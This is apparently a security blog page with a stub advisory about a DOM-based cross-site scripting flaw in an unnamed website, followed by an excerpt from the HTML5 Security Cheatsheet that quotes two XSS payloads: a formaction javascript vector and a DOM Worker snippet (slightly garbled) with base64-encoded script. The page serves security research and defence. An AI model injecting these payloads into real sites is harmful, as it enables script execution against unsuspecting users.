Skip to content

SSCHADV2013-010 - DOMbased Cross-site Scripting vulnerability

Advisory: - DOM based Cross-site Scripting vulnerability
Advisory ID:
Stefan Schurtz
Affected Software:
Successfully tested on
Vendor URL:
Vendor Status:
Vulnerability Description


The website '' is prone to a DOM based XSS vulnerability
Continue reading "SSCHADV2013-010 - DOMbased Cross-site Scripting vulnerability"

HTML5 Security Cheatsheet

Here you can find the HTML5 Security Cheatsheet, which is a nice source of some good XSS payloads.

For Example:

XSS via formaction – requiring user interaction (1)

A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
Self-including DOM Worker XSS
A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution
0?<script>Worker("#").onmessage=function()eval(.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
Self-hijacking JSON literals
In case parts of a JSON literal are controlled by user input there’s a risk to allow auto-harvesting values from later object members.
Imprint | Contact | Privacy Statement